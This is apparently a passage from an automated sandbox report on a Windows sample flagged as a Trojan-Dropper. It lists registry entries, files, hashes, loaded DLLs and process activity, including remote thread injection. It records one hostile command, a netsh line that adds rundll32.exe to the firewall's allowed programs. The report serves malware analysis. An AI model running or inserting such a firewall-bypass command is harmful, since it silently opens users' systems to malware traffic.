HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Hashes\​{dc971ee5-44eb-4fe4-ae2e-b91490411bfc}  ItemData  0x386b085f84ecf669d36b956a22c01e80 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Hashes\​{dc971ee5-44eb-4fe4-ae2e-b91490411bfc}  ItemSize  370 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Hashes\​{dc971ee5-44eb-4fe4-ae2e-b91490411bfc}  SaferFlags 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Paths\​{dda3f824-d8cb-441b-834d-be2efd2c1a33}  ItemData  %HKEY_CURRENT_USER\​Software\​Microsoft\​Windows\​CurrentVersion\​Explorer\​Shell Folders\​Cache%OLK* 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Paths\​{dda3f824-d8cb-441b-834d-be2efd2c1a33}  SaferFlags 
HKLM\​System\​CurrentControlSet\​Control\​Nls\​Language Groups 
HKLM\​System\​CurrentControlSet\​Control\​Nls\​Locale  00000409 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Software\​Microsoft\​Command Processor  CompletionChar 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Software\​Microsoft\​Command Processor  DefaultColor 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Software\​Microsoft\​Command Processor  EnableExtensions 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Software\​Microsoft\​Windows\​CurrentVersion\​Explorer\​Shell Folders  Cache  C:\​Documents and Settings\​user\​Local Settings\​Temporary Internet Files 

8.b) cmd.exe - File Activities

  - Files Created:  
C:\WINDOWS\system32\dll32.dll

  - Files Read:  
c:\dll32.bat

  - Memory Mapped Files:  
File Name
C:\WINDOWS\system32\Apphelp.dll
C:\WINDOWS\system32\netsh.exe
C:\WINDOWS\tt_1211198012.exe
C:\Windows\AppPatch\sysmain.sdb
c:\dll32.bat

8.c) cmd.exe - Process Activities

  - Processes Created:  
Executable Command Line
C:\WINDOWS\tt_1211198012.exe   
C:\WINDOWS\tt_1211198012.exe  "C:\WINDOWS\tt_1211198012.exe" /1  
C:\WINDOWS\system32\netsh.exe   
C:\WINDOWS\system32\netsh.exe  netsh add allowedprogram "C:\WINDOWS\System32\rundll32.exe" dll32 ENABLE 

  - Remote Threads Created:  
Affected Process
C:\WINDOWS\tt_1211198012.exe
C:\WINDOWS\system32\netsh.exe

  - Foreign Memory Regions Read:  
Process: C:\WINDOWS\system32\netsh.exe
Process: C:\WINDOWS\tt_1211198012.exe

  - Foreign Memory Regions Written:  
Process: C:\WINDOWS\system32\netsh.exe
Process: C:\WINDOWS\tt_1211198012.exe

9. tt_1211198012.exe

  - General information about this executable  
Analysis Reason: Started by cmd.exe 
Filename: tt_1211198012.exe 
MD5: ee8d222943c128e8cedf010c0cb03d88 
SHA-1: 2e2fefee6c425014c14996adec7b9393bfe85e25 
File Size: 18432 Bytes
Command Line: "C:\WINDOWS\tt_1211198012.exe" /1  
Process-status at analysis end: dead 
Exit Code:

  - Load-time Dlls  
Module Name Base Address Size
C:\​WINDOWS\​system32\​ntdll.dll  0x7C900000  0x000AF000 
C:\​WINDOWS\​system32\​kernel32.dll  0x7C800000  0x000F6000 
C:\​WINDOWS\​system32\​MSVCRT.dll  0x77C10000  0x00058000 
C:\​WINDOWS\​system32\​USER32.dll  0x7E410000  0x00091000 
C:\​WINDOWS\​system32\​GDI32.dll  0x77F10000  0x00049000 
C:\​WINDOWS\​system32\​IMM32.DLL  0x76390000  0x0001D000 
C:\​WINDOWS\​system32\​ADVAPI32.dll  0x77DD0000  0x0009B000 
C:\​WINDOWS\​system32\​RPCRT4.dll  0x77E70000  0x00092000 
C:\​WINDOWS\​system32\​Secur32.dll  0x77FE0000  0x00011000 

  - SigBuster Output  
UPX All_Versions SN:1634

  - Ikarus Virus Scanner  
Trojan-Dropper (Sig-Id:26843452)

  - Program output  
Stdout: